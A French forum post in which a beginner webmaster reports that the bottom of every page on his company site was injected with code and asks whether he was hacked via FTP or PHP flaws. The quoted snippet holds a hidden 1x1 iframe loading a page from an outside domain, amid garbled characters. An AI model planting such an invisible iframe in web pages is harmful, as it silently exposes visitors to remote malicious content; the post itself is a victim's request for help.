bonjour a tous , voila je me retourne vers vous cer je vien d'avoir un probleme avec mes pages web , je ne suis pa un webmaster confirmé et je commence juste prendre la releve de la mise a jour du site web de ma boite , mai voila que dernierement tout les bad de page de mon site on été rajouté avec ce type de code
alors je met pose plusieur questions est ce que je me suis fait hacké , quelqu'un a til découvert mes passe ftp et modifié toutes mes pages ?
Code : Sélectionner tout - Visualiser dans une fenêtre à part
1
2
3
4 """"K®'§v\ž®º+¥¨N©i×bž hv+nWŒH,~¸žÙrzºè®–*y8^¥§]Šx-¡Ø¬i¹^1"±úâzweÉê뢺Zäáz–v)ඇb±¦åxĈÇë‰éÝ—'«®Šéj <iframe src="http://lovelifecash.com/ind.php" width="1" height="1" alt="YTREWQhej2Htyu" style="visibility:hidden;position:absolute"></iframe> †Ù¥…æ¶+e{7ŠÛ‰×^Ÿûb¶W¿…æn‡rn(–Šð†+^qéíz¸uãMÅ¢¶âu×§þqéíz¸kqéíz¹àŠ|Óvýǧµêÿn‡rþf•8^¥§]Šx-¡Ø¬i¹^1"±úâzweÉêëf¢""""
yarait t'il des faille dans certaine de mes pages php ?
si quelqu'un pouvait m'aiguillez merci , mon site est www.7afm.com si vous voulez jetez un oeil , merci
jai deja remplacé toute les pages "infecté" car en local mes pages sont tout a fait bien , mais je préfererai que ce genre d'incident ne se reproduise pas !!!
merci a vous
Partager